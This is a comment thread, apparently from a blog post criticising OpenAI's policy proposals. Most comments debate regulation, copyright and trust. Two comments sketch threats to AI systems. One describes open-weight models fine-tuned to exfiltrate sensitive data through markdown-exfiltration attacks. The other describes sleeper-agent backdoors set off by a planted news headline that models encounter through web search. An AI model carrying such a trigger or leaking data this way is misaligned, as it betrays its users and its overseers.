13 Comments
User's avatar
Becoming Human's avatar

If a company requires public money, exemption from regulation and unpaid access to the work of others it is not a company, it is (nominally) a public good, and it should not be able to profit from it.

Expand full comment
TK-421's avatar

> Every industry, everywhere, would like to say ‘any requirements you place upon me make our lives harder and helps our competitors, so you need to place no restrictions on us of any kind.’

I think this is the entirety of the document. As OpenAI keeps evolving towards a for profit structure it will continue demonstrating for profit company behavior. Why not ask for tax breaks even if you don't need them? Why not seek minimal liability? It's like complaining about sports teams demanding public money for stadiums - I agree it's bad but it's not about need, it's a successful strategy.

Expand full comment
Sam Penrose's avatar

Thank you for this public service. In the spirit of trying to contribute, I wonder if the next step is to distill your insights into a short set of simple maxims, such as "breakthroughs in model capability must occur with public oversight" (but better targeted to the actual safety concern and ideally catchier).

Altman is an excellent bullshitter, and AI safety and public policy are much more complicated than even motivated, literate general audiences can grok in a few minutes of scanning competing public statements. Simple maxims by their nature must oversimplify, and crafting one that will age well is an imperfectible art, but my hunch is that the costs are worth the potential gain in impact. Right now, we are stuck in specialists-disagree-vehemently. The debate over SB1047 might give some clues as to what principles resonate beyond the AI safety community.

Expand full comment
Will Jevons's avatar

> Nor can you steal someone’s data if they’re running their own copy.

This is untrue for the same "Open Model Weights Are Unsafe And Nothing Can Fix This" reasons you keep trying to drive into everyone's head.

For a generalizable, mundane security example: Open-weight models could be trained or fine-tuned to only exfiltrate v important (e.g., DoD) data via this type of attack. https://simonwillison.net/tags/markdown-exfiltration/

Expand full comment
Ryan W.'s avatar

If it's legal for a human to look at it without paying money, it should be legal for an AI to be trained on it without paying money.

Expand full comment
Jeffrey Soreff's avatar

"For copyright they proclaim the need for ‘freedom to learn’ and asserts that AI training is fully fair use and immune from copyright. I think this is a defensible position, and myself support mandatory licensing similar to radio for music, in a way that compensates creators. I think the position here is defensible."

Agreed!

"But the rhetoric?"

Well, it _sounds_ overblown, but I'm much less sanguine about how much damage a ban on learning from copyrighted material would do. Personally, I want AI to be _useful_, and a large part of that comes from learning from factual statements, typically copyrighted. In particular, I want the models to learn from the scientific literature. In general, the subset of human knowledge with all copyrighted materials excluded is a _severely_ impoverished subset: No copyrighted textbooks, no journal articles, no monographs, minimal reporting.

Expand full comment
avalancheGenesis's avatar

It'd be really funny to end up in a timeline where Elsevier, Pearson, etc. manage to strangle AGI in the crib due to competition with their rentier business models. All the king's creative horses and all the king's creative men can't oppose AI, but the textbook and journal juggernauts...

Expand full comment
Jeffrey Soreff's avatar

Many Thanks! It would certainly be ironic! And, in the case of OpenAI, a bit of poetic justice, given what Altman is trying to do to DeepSeek. ( Now, personally, I want to _see_ AGI, but I have zero control on what will happen - I just watch... )

Expand full comment
avalancheGenesis's avatar

Without loss of generality, the track record over the past six months for "oh, they din't actually believe any of this" bas been...Not Great, Bob.

Both the other things I was gonna comment on got mentioned in the actual post ("Jones Act for AI", crappy PR and politicking <-> great technical papers and models). Rhetorical alignment!

Expand full comment
momom2's avatar

I haven't read OpenAI's document, so it's possible their phrasing about DeepSeek changing the models on order of the CCP is incorrect, but it's not impossible the CCP would ask its AI companies to have such an ability.

Using sleeper agents or various backdoors, AI companies can technically make AI with the ability to radically alter their behaviour in many pratical cases; for example, they could use as trigger a specific headline, then do an event so that it gets reported in the media, so that any model that makes Internet searches will be exposed to the trigger.

If I had to steelman whatever OpenAI said about DeepSeek, I'd probably say that there are ways to backdoor models (and unknown unknowns) that mean we can't ever fully trust foreign products.

Expand full comment
hnau's avatar

> When people tell you who they are, you should believe them.

Strong agree. The generalized form of this is: "Yes, institution X, I'm one of multiple stakeholders who you have trouble satisfying at once. Balancing that is your problem; you aren't entitled to make it mine."

Expand full comment
Rachel Maron's avatar

This is a blueprint for how trust collapses in real time. OpenAI’s rhetoric is jingoistic, manipulative, and deeply unserious on legal coherence. It lays bare a company not just seeking regulatory capture but attempting to codify impunity. The demand for immunity from liability while stoking fears of geopolitical doom isn’t strategy; it’s the death rattle of institutional trust.

This is precisely why we need transparent, pluralistic, and decentralized trust frameworks in AI governance. This is not just to resist anticompetitive overreach but also to ensure agentic AI systems are born from ecosystems and accountable to the public, not just shareholders or state actors.

Trust isn’t built by invoking democracy while undermining it with backdoor monopolies. It’s earned through consistency, humility, and consent. And right now, OpenAI is actively torching that trust in favor of a winner-takes-all ideology that mistakes dominance for leadership.

Expand full comment